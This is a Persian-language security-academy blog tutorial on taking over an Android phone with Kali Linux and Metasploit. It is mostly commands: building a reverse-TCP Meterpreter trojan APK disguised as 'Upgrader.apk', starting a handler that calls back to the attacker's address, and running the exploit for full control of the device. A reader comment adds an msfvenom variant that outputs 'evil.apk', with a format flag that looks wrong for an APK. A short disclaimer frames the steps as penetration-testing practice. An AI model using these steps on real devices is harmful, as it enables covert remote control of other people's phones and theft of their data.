جستجو برای:
سبد خرید 0
  • صفحه اصلی
  • مقالات
  • دوره های تخصصی
  • فروشگاه
  • قوانین
  • ارتباط با ما

ورود

رمز عبور را فراموش کرده اید؟

هنوز عضو نشده اید؟ عضویت در سایت
آکادمی امنیت فناوری اطلاعات ایران
  • صفحه اصلی
  • مقالات
  • دوره های تخصصی
  • فروشگاه
  • قوانین
  • ارتباط با ما
ورود و ثبت نام

وبلاگ

آکادمی امنیت فناوری اطلاعات ایران > مقالات > مقالات > اندروید را با کالی لینوکس هک کنید

اندروید را با کالی لینوکس هک کنید

access_time۱۳۹۹-۰۹-۱۴
perm_identity ارسال شده توسط مدیریت
folder_open مقالات
visibility 195 بازدید

به سری آموزش های تست نفوذ آکادمی امنیت اطلاعات ایران خوش آمدید. در این مقاله قصد تست نفوذ به دستگاه اندرویدی را داریم که در محیط کالی بوسیله متااسپلویت انجام می شود. پس آماده باشید تا اندروید را با کالی لینوکس هک کنید…

هدف از این آموزش تمرین تست نفوذ و آشنایی با راه های نفوذ در اندروید است، به هیچ وجه برای اهداف شخصی و دسترسی به گوشی انجام ندهید. پیشنهاد ما این است که برای امور تست نفوذ اندروید یک لابراتوار کوچک و کم هزینه برای خود تهیه کنید.

هشدار

مرحله اول

کالی را راه اندازی کنید

وارد کالی لینوکس خود شوید و ترمینال را باز کنید تا مراحل ساخت یک فایل  Trojan .apk برای نفوذ را پیش ببریم.

دستور زیر را در ترمینال بنویسید:

msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk

LHOST را آدرس IP خود یا سرور برای برقراری ارتباط وارد کنید. در صورت استفاده از آدرس IP خود باید قابلیت Port forwarding را فعال کنید.

این روش نفوذ در تمام تجهیزات اندرویدی در محیط شبکه اینترنت یعنی WAN هم قابل اجرا است. پس بنشینید و آماده باشید تا اندروید را با کالی لینوکس هک کنید.

دستورات وارد شده در ترمینال کالی لینوکس

مرحله دوم

ترمینال دیگری باز کنید

در حالی که صفحه ترمینال بالا باز است، ترمینال دیگری را باز کنید، و کنسول متااسپلویت را با دستور msfconsole اجرا کنید:

نسول متااسپلویت

مرحله سوم

یک Listener برای دریافت اطلاعات تنطیم کنید

بعد از اینکه متااسپلویت لود شد دستور زیر را اجرا کنید

use exploit/multi/handler

محیط ترمینال

در ادامه باید یک (reverse) payload تنظیم کنیم تا ارتباط بین هکر و قربانی برقرار شود، دستور زیر را تایپ کنید:

set payload android/meterpreter/reverse_tcp

برای تنظیم LHOST همان آدرسی که مرحله قبل تنظیم کردید و برای خودتان است را وارد کنید.

set LHOST 192.168.0.4

مرحله چهارم

اکسپلویت کنید

دستور exploit  را تایپ کنید

سپس برای اینکه اندروید را با کالی لینوکس هک کنید باید فایل Upgrader.apk که برنامه متااسپلویت ساخته است را در تلفن اندروید خود اجرا کنید. این فایل در پوشه Root شما ساخته و ذخیره شده است.

نفوذ موفق

بعد از نصب و اجرا در سیستم اندروید میتوانید به وسیله کنسول متااسپلویت خود، کلیه کنترل اندروید را بدست بگیرید.

——————————————HACKED————————————————-


نکته: ممکن است این روش بر انواع مختلف اندروید های جدید که دارای برزورسانی و تقویت سیستم امنیتی و دارای برنامه امنیتی باشند بدرستی کار نکند.

اگر بیشتر در مورد متااسپلویت میخواهید بدانید، مقالات زیر را بخوانید:

متااسپلویت چیست؟ مقاله ای کامل در مورد متااسپلویت

سایت رسمی متااسپلویت

اشتراک گذاری:
برچسب ها: اندروید را با کالی لینوکس هک کنیدهک اندروید با کالی لینوکس
درباره مدیریت

تیم مدیریت سایت

نوشته های بیشتر از مدیریت
مطالب زیر را حتما بخوانید
  • برنامه های هک با اندروید

    111 بازدید

  • سیستم عامل Parrot

    104 بازدید

  • اطلاعات شخصیم افشا شده؟

    225 بازدید

  • بلک آرچ چیست؟

    140 بازدید

  • راه اندازی آزمایشگاه تست نفوذ برنامه های اندرویدی

    141 بازدید

جدید تر موجودی بیت کوین طرف مقابل را ببینید
قدیمی تر راه اندازی آزمایشگاه تست نفوذ برنامه های اندرویدی

1 دیدگاه

به گفتگوی ما بپیوندید و دیدگاه خود را با ما در میان بگذارید.

  • a.rm گفت:
    ۱۴۰۰-۰۶-۲۵ در ۱۹:۳۸

    با سلام
    اگر با این ارور مواجه میشید: command not found
    این دستور رو بزنید:
    /usr/bin/msfvenom -p android/meterpreter/reverse_tcp LHOST=(Your IP) -f rb -o /root/evil.apk

    پاسخ

دیدگاهتان را بنویسید لغو پاسخ

جستجو
جستجو برای:
دسته‌ها
  • سخت افزار
  • مقالات
  • همکاری
  • نقشه سایت
  • خرید دوره
  • قوانین
آکادمی امنیت فناوری اطلاعات ایران

هدف این مجموعه ایجاد فضایی جهت ارتقای علم امنیت حوزه فناوری اطلاعات در ایران می‌باشد. با وجود اینکه به امنیت بسیار کمتر از علوم دیگر این حوزه پرداخته شده است. ما به دنبال اعتلای این علم در کشورمان هستیم.

راه های ارتباطی
  • phone_android
    09190982860
  • perm_phone_msg
    info [at] sec98.ir
با اطمینان خرید کنید

تمامی حقوق برای [ آکادمی امنیت فناوری اطلاعات ایران ] محفوظ است.
keyboard_arrow_up